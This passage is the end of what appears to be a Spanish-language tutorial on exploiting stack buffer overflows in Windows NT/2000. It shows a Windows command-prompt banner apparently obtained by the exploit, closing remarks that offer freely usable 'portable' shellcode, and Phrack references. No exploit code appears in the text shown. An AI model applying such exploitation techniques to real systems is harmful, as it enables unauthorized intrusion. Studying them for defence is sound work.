	Microsoft Windows 2000 [Version 5.00.2195]
	(C) Copyright 1985-1999 Microsoft Corp.

	C:>


	Ultimas palabras ...
	____________________

	Con este artculo se ha pretendido proporcionar un camino eficiente
	y rpido de explotar desbordamientos de pila en WinNT/2k. Asimismo
	se est proporcionando un shellcode "portable" de fcil integracin
	que puede ser usado libremente sin ninguna restriccin.

	Las ltimas actualizaciones de este papel y optimizaciones en el
	cdigo pueden ser descargadas de http://www.deepzone.org


	---

	[1] "Smashing The Stack For Fun And Profit"
	     http://www.phrack.com/search.phtml?view&article=p49-14

            "Win32 Buffer Overflows (Location, Exploitation and Prevention)"
             http://www.phrack.com/search.phtml?view&article=p55-15


	___________________________________________________________________

					     		       -- |Zan/DZ
							<izan@deepzone.org>
	___________________________________________________________________
	
